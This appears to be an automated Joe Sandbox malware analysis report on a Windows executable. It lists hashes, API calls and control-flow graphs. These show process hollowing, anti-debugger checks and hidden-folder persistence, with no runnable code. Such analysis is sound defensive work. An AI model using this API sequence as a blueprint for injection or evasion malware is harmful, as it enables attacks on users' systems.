                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D491C222B08E5395FB70AF7995806BDBBB0AB00B88F946139DE4E57AC4DF78D441D720
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                          • String ID: \systemsx.exe
                                                                                                                                                                                                                          • API String ID: 73155330-411024204
                                                                                                                                                                                                                          • Opcode ID: 0a7f0d66afac4997814649c8af90caf0201cf9696239cfb2e5c05bc16f8875b9
                                                                                                                                                                                                                          • Instruction ID: 692d39c4954d2c9e56d6445663bfbdb0b7d70f0ec0f2b8d051b2453615a73ce7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7f0d66afac4997814649c8af90caf0201cf9696239cfb2e5c05bc16f8875b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE419D62B08E4795EE24BB7696042BDF271AB08BE4F942731DA2D077D5EE7CE055C310
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                          • API String ID: 3580290477-857341436
                                                                                                                                                                                                                          • Opcode ID: 3421cdae86d5a0952016b7d9d11c58c98a1572ba5bc50a0e7f46634ddbaf0301
                                                                                                                                                                                                                          • Instruction ID: e617ba7ca227104c13a2fd0c3e3415609d2e875def47c976fc473243aeae2abd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3421cdae86d5a0952016b7d9d11c58c98a1572ba5bc50a0e7f46634ddbaf0301
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20416C36B08F0395EF24FF359A500B9F7B5AB45B84B956036E94E47B85EE3CE481C220
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                          • Opcode ID: 493868279943cf6de1db68bc0c110568ffeb01f8efcf1e31354e637f926215cd
                                                                                                                                                                                                                          • Instruction ID: d6fb3b18df2333806b71b2732f9cf062f6859c27a951d48ce219831662058211
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 493868279943cf6de1db68bc0c110568ffeb01f8efcf1e31354e637f926215cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82417E22B18F4691EB60AF25E9443A9B7A1FB98794F846031EA4D87798EF3CD405C760
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF79CD610DF), ref: 00007FF79CD62EFC
                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF79CD610DF), ref: 00007FF79CD62F3D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                          • Opcode ID: f64f459e772a84a9fc75b913d82172dbaa42afab898276dd930f3945c3b81c9b
                                                                                                                                                                                                                          • Instruction ID: e6ad857fe2f81a90e99d9708a08ad26a5feb548ae75f57cb359f5e35a0228dd2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f64f459e772a84a9fc75b913d82172dbaa42afab898276dd930f3945c3b81c9b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3115B32608F4282EB209B25E90026AB7F1FB88B94F985231EECC07765DF3CC551CB00

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:41.7%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:19.7%
                                                                                                                                                                                                                          Total number of Nodes:483
                                                                                                                                                                                                                          Total number of Limit Nodes:11

                                                                                                                                                                                                                          Callgraph


                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          [Control-flow graph of the function at 7ff794832048 (legend: executed / not executed). API calls on the graph, in order of first appearance: GetModuleFileNameW, CreateProcessW, CreateFileW, GetFileSize, CloseHandle, VirtualAlloc, ReadFile, VirtualFree, GetThreadContext, ReadProcessMemory, GetModuleHandleA, GetProcAddress, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, RtlCompareMemory, SetThreadContext, ResumeThread.]
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: 9f43c6d956b3b94b252bf42de329de0afb9291d0868d008d58f0830043faacea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E832DA32608AC586D775DF26E894BAAB3A1FB89B84F408135DA8D83B58DF7CD454CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 297 7ff79483345c-7ff794833472 call 7ff7948310a0 call 7ff79483321c 302 7ff79483347c-7ff7948334aa call 7ff794834264 call 7ff794833ce4 call 7ff794833f14 297->302 303 7ff794833474-7ff794833476 ExitProcess 297->303 310 7ff7948334fb-7ff79483350e call 7ff794833f14 302->310 311 7ff7948334ac-7ff7948334bd call 7ff7948343a4 302->311 316 7ff79483354c-7ff79483355f call 7ff794833f14 310->316 317 7ff794833510-7ff794833521 call 7ff7948343a4 310->317 318 7ff7948334d2-7ff7948334d4 ExitProcess 311->318 319 7ff7948334bf-7ff7948334d0 call 7ff7948343a4 311->319 329 7ff794833561-7ff794833572 call 7ff7948343a4 316->329 330 7ff7948335a2-7ff7948335b8 call 7ff794833a74 call 7ff7948333ec 316->330 326 7ff79483352b call 7ff79483327c 317->326 327 7ff794833523-7ff794833525 ExitProcess 317->327 319->318 328 7ff7948334da call 7ff7948332ec 319->328 335 7ff794833530-7ff794833535 326->335 337 7ff7948334df-7ff7948334e4 328->337 339 7ff79483357c call 7ff79483327c 329->339 340 7ff794833574-7ff794833576 ExitProcess 329->340 349 7ff7948335ba-7ff7948335cb call 7ff7948343a4 330->349 350 7ff79483360e-7ff7948336d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 330->350 341 7ff794833537-7ff794833542 Sleep 335->341 342 7ff794833544-7ff794833546 ExitProcess 335->342 344 7ff7948334e6-7ff7948334f1 Sleep 337->344 345 7ff7948334f3-7ff7948334f5 ExitProcess 337->345 348 7ff794833581-7ff794833586 339->348 341->335 344->337 351 7ff794833588-7ff794833593 Sleep 348->351 352 7ff794833595-7ff794833597 ExitProcess 348->352 355 7ff7948335cd-7ff7948335de call 7ff7948343a4 349->355 356 7ff7948335e0-7ff7948335e2 ExitProcess 349->356 351->348 355->356 359 7ff7948335e8 call 7ff7948332ec 355->359 361 7ff7948335ed-7ff7948335f2 359->361 362 7ff794833601-7ff794833603 ExitProcess 361->362 363 
7ff7948335f4-7ff7948335ff Sleep 361->363 363->361
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction ID: 05c0c8ca37b56c8e3f512574f6f693402bcb2dd748248f4fd1138ff8506d93b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6661D931A18A4391EA74BF76A8D5A7AA260BF84701FC0C535D44E871E5DE2DE865C730

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: 7f14b8407257b553299f0ab6276800ed14a495fabf5b6bee14df2c4f4c7458dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C31C73261868186D760EF66E490A2EF7A0FBC4B84F909135FA8E47B68DF7CD455CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: 779574a36404a7db5b7f0526e0601f88c00b452f35439808c92d34de9802ad6b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F05E3090C28381F730AF7BA444779E790AF45B0AF808174D98D07594DF6CE629DB31

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF794833784
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetVolumeInformationW.KERNELBASE ref: 00007FF794833801
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: wsprintfW.USER32 ref: 00007FF7948338A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                          • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction ID: d92f0c2fbb56c4b36f610a5e89522e3b5a32d63e4cd88e61b8805573f9ee347f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11F47562898695DB70AF3AF894BAAA361FBC4B84F80D031D94E43A29EE3DD415C710

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF794833784
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetVolumeInformationW.KERNELBASE ref: 00007FF794833801
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: wsprintfW.USER32 ref: 00007FF7948338A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF794833AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE ref: 00007FF794833AC4
                                                                                                                                                                                                                          • CopyFileW.KERNELBASE ref: 00007FF794833ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE ref: 00007FF794833AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          • Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                                                                          • Instruction ID: a02f3ce1acc62e4c75ee1cfb73f0b1b05c11ea3ce02ff138b768f3099c433540
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C018471A1898692EB70EF35E4947AA9360FB94744FC0C432D64E835A8EF2CD259CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: 468f9866ae5bb34b81d1bce3423cf9a8276083ead9fb9d5162dfa1d5a5c74937
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7631073661C6C286DB30EF75E4987AAB3A0FB84700F805136E68D87A58EB7DC559CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
